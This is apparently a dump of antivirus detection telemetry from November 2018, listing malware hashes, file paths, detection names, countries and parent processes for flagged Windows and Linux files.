  Row(detection=Row(filename='06611cc1cfe01e4d3cb6067e59287aae15876ebcd1dfd575bd5fcc5e652b86da', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\06611CC1CFE01E4D3CB6067E59287AAE15876EBCD1DFD575BD5FCC5E652B86DA', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='06611cc1cfe01e4d3cb6067e59287aae15876ebcd1dfd575bd5fcc5e652b86da', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.139\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.139\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qwindows.dll', filepath='e:\\program files (x86)\\hi-rez studios\\platforms\\qwindows.dll', filesize=896000, name='W32/Ramnit.C.#M1.#R1'), hash='17b799743c0fc770cb12f7b7599c09595bc98746392d0567947eeb30112794f6', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='4f27b625559438e4724e55f2f7249971e0eac601725e6830aa44719a62ad14a1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smedwgpe.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\SmeDwGpE.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052237-4849409d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052237-4849409D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061319-5d831676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061319-5D831676', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055242-7c1002a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055242-7C1002A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061439-8d12cfb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061439-8D12CFB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5dbc6e665b427214207a424715dea0b90ef57058fd1a313b4e9efb9358fc6f03', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.024\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.024\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:15:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061327-61ed313f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061327-61ED313F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iyfimegm.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\iyFIMEGM.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tissvwjc.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\TIsSvWJC.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054248-199af7ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054248-199AF7EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Wow64Cache\\MSieXec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T16:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054739-c78cf550', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054739-C78CF550', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053136-8991caec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053136-8991CAEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Media Network Sharing\\MsieXEc64.Exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T16:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='51e15b518151957ed6eca9c92dfe0f37f10a7663c2233edad6ea1a9717194917', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T23:18:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jssw.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\JSSW\\JSSW.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233908-a9cc7a44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbcc44a7\\AVSCAN-20181102-230036-F9DC4DB5\\AVSCAN-20181102-233908-A9CC7A44', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060148-c13efa55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060148-C13EFA55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061617-c7392449', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061617-C7392449', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055312-8e0506ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055312-8E0506AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060548-5048f405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060548-5048F405', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062013-542561f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062013-542561F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050951-7f9e9fc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050951-7F9E9FC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055532-e133d431', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055532-E133D431', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050435-c3214ccc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050435-C3214CCC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062007-502c6967', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062007-502C6967', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060429-217ba79f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060429-217BA79F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050958-83a3c84b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050958-83A3C84B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060059-a474e50c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060059-A474E50C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051853-c2a63981', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051853-C2A63981', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052105-11193495', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052105-11193495', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060224-d6a0297d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060224-D6A0297D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062103-71d31de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062103-71D31DE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062455-fbefda1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062455-FBEFDA1A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052906-3037ab2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052906-3037AB2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061856-26373f7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061856-26373F7D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053622-33ce8f67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053622-33CE8F67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061129-1be819de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061129-1BE819DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052125-1ce28997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052125-1CE28997', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060229-d987b5cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060229-D987B5CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:27Z'), dt=datetime.date(2018, 11, 2)),
